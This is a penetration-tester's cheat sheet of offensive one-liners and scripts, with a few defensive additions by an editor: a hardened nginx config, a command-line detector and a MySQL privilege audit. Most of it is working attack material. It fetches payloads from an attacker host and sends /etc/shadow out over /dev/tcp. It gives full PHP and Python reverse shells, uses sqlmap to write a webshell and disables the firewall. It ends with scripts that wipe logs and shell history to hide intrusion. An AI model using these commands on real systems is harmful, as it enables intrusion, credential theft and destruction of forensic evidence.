One-Liners and Dirty Scripts
They don't have to be elegant, they just have to get the job done.
If I use it and it's not here, it's probably over here: https://github.com/burmat/burmatscripts

FILE TRANSFERS

Python HTTP File Download

If you have remote command execution on a box with python - something like this should do the trick:
python -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/meterpreter', '/tmp/meterpreter');"
or if it is a Windows box, it's not much different:
C:\Python2.7\python.exe -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/rs_powershell.exe', '/temp/rs_powershell.exe');"

VBS HTTP File Download

I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download:
echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://<attacker ip>/meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs"

Impacket's smbserver.py

As always, the impacket suite shines. Use smbserver.py to open an SMB server on your host for file exfiltration:
```
./smbserver.py burmat_exfil ./loot -username burmat -password burmat

## from the target:
PS C:\> net use Q: \\10.1.1.123\burmat_exfil /user:burmat burmat
PS C:\> mv .\bh.zip Q:\bh.zip
PS C:\> net use Q: /delete
```

PERL HTTP File Download

perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => "http://10.10.10.11/exploit.sh"); my $file = $ff->fetch() or die $ff->error;'

NGINX + PUT

Picked up from here (thanks @ippsec), you can start a nginx server that can accept PUT requests for file transfer via HTTP:
```
❯ cat /etc/nginx/sites-enabled/file_upload
server {
    listen 8001 default_server;
    server_name burmat.co;
    location / {
        root /var/www/upload/;
        dav_methods PUT;
    }
}

❯ service nginx start
```
Issue a PUT request from a remote system to upload files to /var/www/upload on your system:
```
## CURL (-T sends the file body as-is with a PUT; -F would wrap it in a multipart form that nginx saves verbatim):
❯ curl -T /home/user/l00t.txt http://192.168.1.87:8001/l00t.txt

## POWERSHELL
PS C:\Users\victim> Invoke-RestMethod -Method PUT -Uri "http://10.10.14.12:8001/l00t.txt" -InFile l00t.txt
```
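The config above accepts a PUT from anyone who can reach port 8001, so a third party on the same network could drop files onto, or overwrite files on, your box during an engagement. An added hardened version (example config, not from the original page or ippsec's notes; the 10.10.14.0/24 range and the 50m limit are assumed values to adjust per engagement):

```nginx
# /etc/nginx/sites-enabled/file_upload (hardened variant; values are assumptions)
server {
    listen 8001 default_server;
    server_name burmat.co;

    # cap the request body so a stray or hostile client cannot fill the disk
    client_max_body_size 50m;

    location / {
        root /var/www/upload/;
        dav_methods PUT;

        # only the engagement's target range may write; everyone else gets 403
        allow 10.10.14.0/24;
        deny all;

        # PUT to a/b/c.txt creates the missing sub-directories instead of failing
        create_full_put_path on;

        # uploaded files are owned by the nginx user and not world-writable
        dav_access user:rw group:r all:r;
    }
}
```

Reload nginx after the change and confirm from an address outside the allowed range that a PUT is refused before relying on it.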

Netcat File Transfer

Because if Netcat is on the system, everything becomes easier:
```
listener#> nc -l -p 4444 > output.file
sender#> nc -w 3 [destination] 4444 < input.file
```
(and if it's not - go get it: C:\Users\burmat>tftp -i 10.10.10.10 get nc.exe)

CERTUTIL Transfer

Using certutil.exe is a clever way to get files down to a victim if you are attacking a Windows box and limited on methods:
```
certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe
```
You can also write a file from Base64 encoded text:
```
certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dll
regsvr32 /s /u C:\temp\payload.dll
```
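The Python, VBS and certutil download methods in the sections above all leave a recognisable process command line behind, which is what a defender keys on. As an added example, not part of the original page, here is a small Python detector run over constructed "Image|CommandLine" records modelled on this page's one-liners (the rule names, patterns and sample records are all my own assumptions, not real telemetry):

```python
import re

# Constructed sample process-creation records ("Image|CommandLine"), modelled on
# the one-liners in this page's transfer sections; not real telemetry.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe",
    r"C:\Windows\System32\certutil.exe|certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dll",
    r"C:\Windows\System32\regsvr32.exe|regsvr32 /s /u C:\temp\payload.dll",
    r"C:\Windows\System32\cscript.exe|cscript //B C:\temp\download.vbs",
    r"C:\Python2.7\python.exe|python.exe -c import urllib; f = urllib.URLopener(); f.retrieve('http://10.10.15.11/rs.exe', 'C:\temp\rs.exe');",
    r"C:\Windows\System32\certutil.exe|certutil.exe -verify C:\temp\cert.cer",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c dir C:\temp",
]

# Rule name -> case-insensitive pattern over the command line (names are assumed).
RULES = [
    ("certutil_urlcache_download", re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+https?://", re.I)),
    ("certutil_decode", re.compile(r"certutil(\.exe)?\s.*-decode\s", re.I)),
    ("regsvr32_silent_register", re.compile(r"regsvr32(\.exe)?\s.*[/-]s\s.*\.dll", re.I)),
    ("cscript_batch_vbs", re.compile(r"cscript(\.exe)?\s.*//B\s.*\.vbs", re.I)),
    ("python_inline_urllib", re.compile(r"python[\d.]*(\.exe)?\s+-c\s.*urllib", re.I)),
]

def parse_event(line):
    """Split one constructed record into (image, command line)."""
    image, _, cmdline = line.partition("|")
    return image.strip(), cmdline.strip()

def match_rules(cmdline):
    """Return the names of every rule whose pattern fires on the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return (image, cmdline, [rule names]) for every record that fires a rule."""
    hits = []
    for line in events:
        image, cmdline = parse_event(line)
        names = match_rules(cmdline)
        if names:
            hits.append((image, cmdline, names))
    return hits

if __name__ == "__main__":
    for image, cmdline, names in scan(SAMPLE_EVENTS):
        print("[%s] %s: %s" % (",".join(names), image, cmdline))
```

The benign `certutil -verify` and `cmd /c dir` records are there to show the rules key on the download/decode switches, not on the binary name alone.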

SQLMAP - User w/ FILE Privileges

If you have SQLi with a user account that has FILE privileges, you can use sqlmap to write the file to disk without formulating an INTO OUTFILE query yourself:
```
❯ sqlmap -r inject.req --dbms "mysql" --file-write shell.php --file-dest \\inetpub\\wwwroot\\shell.php
```
To see if you have the privilege, attempt (you might not have rights) to dump the user table:
```
❯ sqlmap -r inj.req --dbms "mysql" -D mysql -T user -C User,File_Priv --dump
.. SNIP ..
[2 entries]
+---------+-----------+
| User    | File_Priv |
+---------+-----------+
| burmat  | Y         |
| root    | Y         |
+---------+-----------+
```
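From the other side of the table, the check a DBA would want after reading the above: which MySQL accounts hold FILE, and whether secure_file_priv confines where they can write. Added example, not the page's own; the 'webapp'@'localhost' account is a hypothetical placeholder:

```sql
-- Which accounts can read and write files through the server process?
SELECT User, Host, File_priv FROM mysql.user WHERE File_priv = 'Y';

-- Where may they write? '' means anywhere the server can, NULL means file
-- operations are disabled, a path restricts them to that directory.
SHOW VARIABLES LIKE 'secure_file_priv';

-- An application account used by a web app should never need FILE at all
-- ('webapp'@'localhost' is a placeholder for the account found above).
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
```

secure_file_priv is read-only at runtime, so to confine it you set `secure-file-priv` in my.cnf and restart the server.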

XML File Creation on Target (via copy/paste)

This is a clever way to get XML over to the system using copy and paste, and then write that XML to a file:
```powershell
PS C:\> $console = [XML] @"
<XML CODE HERE>
"@

# write the xml to file:
PS C:\> $console.save("C:\users\burmat\documents\console.xml")
```

Base64

Using netcat

```bash
# receiving host
nc -lp 4443 | base64 -d > loot.txt

# sender host
base64 /etc/shadow > /dev/tcp/10.10.10.123/4443
```

Copy and Paste

```bash
## encode from file with (base64 -w 0 shell.py gives the same single line):
base64 <<< $(cat shell.py) | tr -d "\n"

## decode to file with:
echo -n "ZmlsZSBjb250ZW50IGhlcmUK" | base64 -d > shell.py
```

xclip

Not a true method of file transfer, but useful nonetheless:
cat /usr/share/nishang/Client/Out-HTA.ps1 | xclip -sel clip

REVERSE SHELLS / SHELLS

PHP Reverse Shell - Minified

<?php set_time_limit (0); $VERSION = "1.0"; $ip = "10.10.10.10"; $port = 8080; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { exit(1); } $daemon = 1; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?>

Python Reverse Shell for Windows

```python
import os,socket,subprocess,threading;

def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))

p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```

WinRM Ruby Shell

```ruby
require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  no_ssl_peer_verification: true
)

command=""

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    print "PS > "
    command = gets
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end
```
(originally sourced from: https://github.com/WinRb/WinRM)

ENUMERATION

Finding Vulnerable Applications (Linux)

This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of installed packages (rpm or dpkg) on the machine (/tmp/packages.txt). Copy this file to a machine that has searchsploit, and run the script.
Generate the file with: FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
(Example Output from my Kali VM)
(thanks to chryzsh for doing the heavy lifting)

"Proc Mon" (IppSec) Script

One of the handiest scripts to find running jobs and processes in real time. Thanks to IppSec for sharing it with the world:
```bash
#!/bin/bash

IFS=$'\n'
old_process=$(ps -eo command)

while true; do
    new_process=$(ps -eo command)
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done
```

SNMP Walker

I don't remember where I got this, but it is incredibly useful for focusing on key info from an snmpwalk before sifting through all of it:
```bash
#!/bin/bash
for ip in $(cat ~/Documents/labs/targets.txt | awk '/^[0-9]/ {print $1}'); do
    # make sure the per-target output directory exists before redirecting into it
    mkdir -p ~/Documents/labs/$ip/scans

    echo "Performing snmpwalk on public tree for" $ip " - Checking for System Processes"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.1.6.0 > ~/Documents/labs/$ip/scans/systemprocesses.txt

    echo "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > ~/Documents/labs/$ip/scans/runningprograms.txt

    echo "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.4 > ~/Documents/labs/$ip/scans/processespath.txt

    echo "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.2.3.1.4 > ~/Documents/labs/$ip/scans/storageunits.txt

    echo "Performing snmpwalk on public tree for" $ip " - Checking for Software Name"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 > ~/Documents/labs/$ip/scans/softwarename.txt

    echo "Performing snmpwalk on public tree for" $ip " - Checking for User Accounts"
    snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 > ~/Documents/labs/$ip/scans/useraccounts.txt

    echo "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports"
    snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 > ~/Documents/labs/$ip/scans/tcplocalports.txt

    echo "Performing snmp-check scan for" $ip
    snmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txt

    echo "Cleaning up empty files..."
    find ~/Documents/labs/$ip/scans/ -size 0 -print0 | xargs -0 rm
done
```

Ping Scan

Linux Ping Scanning:

You can use a regular-old for loop:
for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done
Or you can try out the following python script:
```python
#!/usr/bin/python
import multiprocessing, subprocess, os

def pinger( job_q, results_q ):
    DEVNULL = open(os.devnull,'w')
    while True:
        ip = job_q.get()
        if ip is None: break          # sentinel: no more work for this worker
        try:
            subprocess.check_call(['ping','-c1',ip],stdout=DEVNULL)
            results_q.put(ip)         # ping exited 0, so the host answered
        except subprocess.CalledProcessError:
            pass                      # no reply from this address

if __name__ == '__main__':
    pool_size = 255
    jobs = multiprocessing.Queue()
    results = multiprocessing.Queue()
    pool = [ multiprocessing.Process(target=pinger, args=(jobs,results)) for i in range(pool_size) ]
    for p in pool:
        p.start()

    for i in range(1,255):
        jobs.put('10.120.15.{0}'.format(i))

    for p in pool:
        jobs.put(None)

    for p in pool:
        p.join()

    while not results.empty():
        ip = results.get()
        print(ip)
```

Windows Ping Scan:

Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a cmd prompt:
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.1.%i | FIND /i "Reply" >> ips.txt

REMOTE DESKTOP (ENABLE / ADD)

Enable RDP:

```powershell
PS > Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS > Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```
If you need to add your user to the group, you can use: NET LOCALGROUP "Remote Desktop Users" domain\user /ADD. And if you need to disable the firewall altogether: NetSh Advfirewall set allprofiles state off

CRACKING

Password Spray List

Use exrex [https://github.com/asciimoo/exrex] to generate custom wordlists to password spray with:
```
python exrex.py "(Spring|Winter|Autumn|Fall|Summer|Winter)(20)1[78]!"
```

Small Wordlist, Rules

I got hit with having to crack mscachev2 hashes, which can be slow. This is a perfect time to try targeted (small) wordlists and instead pass in some tried-and-tested rules: hashcat64.exe -a 0 -m 2100 -r rules/d3adhob0.rule mscachev2hash.txt wordlist.txt -o cracked.txt

SYSTEM CLEANUP

Purge Linux Logs

```sh
#!/bin/sh

/etc/init.d/sysklogd stop
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
cd /var/log
for ii in $VARLOGS; do
    echo -n > $ii
    rm -f $ii.? $ii.?.gz
done

/etc/init.d/samba stop
rm -f /var/log/samba/*

rm -f /var/lib/dhcp3/*

for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
    echo -n > $ii
done
```

Covering Your Tracks

```bash
#!/bin/bash
echo "COVERING TRACKS"
echo "clearing /var/log/auth.log"
echo "" > /var/log/auth.log
echo "clearing ~/.bash_history"
echo "" > ~/.bash_history
echo "clearing /root/.bash_history"
echo "" > /root/.bash_history
echo "removing ~/.bash_history"
rm ~/.bash_history -rf
echo "removing /tmp/"
rm -R /tmp/*
echo "clearing /var/log/messages"
echo "" > /var/log/messages
echo "clearing command history"
history -c
```